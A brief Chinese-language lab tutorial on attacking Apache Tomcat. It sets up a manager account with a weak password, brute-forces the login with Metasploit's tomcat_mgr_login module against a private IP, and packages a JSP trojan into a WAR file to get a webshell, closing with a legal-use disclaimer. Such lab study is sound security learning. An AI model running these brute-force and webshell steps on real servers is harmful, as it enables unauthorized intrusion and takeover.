Tomcat环境搭建

• windows系统xampp搭建tomcat
• linux yum搭建tomcat

修改tomcat目录下的conf/tomcat-users.xml文件开启管理后台口令认证

<role rolename="manager-gui"/>
<user username="admin" password="1234" roles="manager-gui"/>

Tomcat口令暴力猜解-msf

use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run

• 注意：tomcat默认每个账号登陆5次失败后，账户就会被锁定

  有绕过防爆机制的python脚本，留言

Tomcat后台getshell

jar -cvf xiaoma.war "xiaoma.jsp"
//jar -cvf 制作的war包文件名 木马的路径

参考链接

Tomcat7+ 弱口令 && 后台getshell漏洞

制作war木马并且拿下webshell

csdn-Metasploit爆破Tomcat弱口令和漏洞利用

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !